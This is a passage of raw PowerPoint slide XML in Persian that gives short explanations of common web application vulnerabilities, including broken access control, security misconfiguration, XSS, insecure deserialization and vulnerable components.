          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="4657791"/>
            <a:ext cx="5218177" cy="5436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algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>محدودیت</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>هایی که کاربران مجاز</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، مجاز به انجام آن هستند، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اغلب به درستی اجرا نمی</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شوند. مهاجمان می</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>توانند از این </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کاستی</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> برای دسترسی به قابلیت</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های غیرمجاز و / یا داده</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ها مانند دسترسی به حساب</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های دیگر کاربران، مشاهده فایل</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های حساس، تغییر دادن داده</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های کاربران دیگر، تغییر حقوق دسترسی و غیره استفاده کنند.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Freeform 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F2374FD-7476-44F3-B906-9417B048A9A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75187" y="4564191"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> کنترل دسترسی ناقص</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9" name="Freeform 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA4B2B9D-42EE-48ED-AED4-5EA8E4B64D6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1490401" y="5457487"/>
            <a:ext cx="5218177" cy="684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algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>تنظیمات</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> غلط </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>امنیتی اغلب </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>مشاهده می‌گردد</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>. این </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>تنظیمات غلط </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>معمولا نتیجه</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ای از تنظیمات پیش فرض ناامن، پیکربندی</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ناقص</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> یا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ad hoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، ذخیره</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سازی ابر باز، هدر اشتباه تنظیم شده </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>و پیام</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های خطای طویل حاوی اطلاعات حساس است. نه تنها تمام سیستم عامل</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ها، چارچوب</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ها، کتابخانه</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ها و برنامه</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0" smtClean="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های کاربردی باید به صورت ایمن پیکربندی شوند، بلکه باید آنها را نیز به موقع وصله / ارتقا داد.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Freeform 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A858E023-0889-4FE9-9B01-62527B94C07F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75187" y="5434087"/>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 xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4E0F83D-B235-48A5-A352-7B6BBC2BAE17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="6338183"/>
            <a:ext cx="5218177" cy="6624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algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نقص</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>زمانی </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اتفاق می افتد </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>که برنامه </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شامل داده</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>‌</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>غیرقابل اعتماد</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> در یک صفحه وب جدید بدون اعتبار </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سنجی </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>مناسب یا فرار باشد، یا یک صفحه وب موجود با داده های ارائه شده توسط کاربر را با استفاده از مرورگر </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>که می تواند جاوا اسکریپت</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> یا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> ایجاد کند</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>،</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> به روزرسانی </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>می‌کند</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>به مهاجمان اجازه می دهد اسکریپت ها را در مرورگر قربانی اجرا کنند که می تواند نشست کاربر را برباید، وب سایت ها را خراب کند یا کاربر را به سایت های مخرب هدایت کند.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Freeform 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC128063-7A66-4F34-A720-2EAB6E988467}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75187" y="630398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Cross-Site Scripting (XSS)</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3" name="Freeform 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E895283-6404-4647-9AED-A7928C930CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="7283679"/>
            <a:ext cx="5218177" cy="5112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algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Deserialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ناامن اغلب منجر به اجرای کد از راه دور می شود. حتی اگر معایب </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>deserialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>منجر به اجرای کد از راه دور </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ن</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شود، می توان آنها را برای انجام حملات، از جمله حملات بازیابی، حملات تزریق و حملات تشدید امتیاز، مورد استفاده قرار داد.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Freeform 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1770D43A-73DB-44C0-AF41-71E9A314BA2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75187" y="7173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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1200" b="1" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ناامن</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 Deserialization </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Freeform 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D3ABA2A-B6B4-4A1F-B3F6-D4C323A211D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488438" y="8098279"/>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algn="just" rtl="1"/>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اجزاء مانند کتابخانه ها، چارچوب ها و دیگر ماژول های نرم افزاری، دارای امتیازاتی مشابه با برنامه می باشند. اگر یک جزء آسیب پذیر مورد استفاده قرار گیرد، چنین حملاتی می تواند </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>موجب </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>از دست </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>دادن</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> اطلاعات جدی یا منجر به تصاحب سرور شود. برنامه ها</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1000" dirty="0">
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1000" dirty="0">
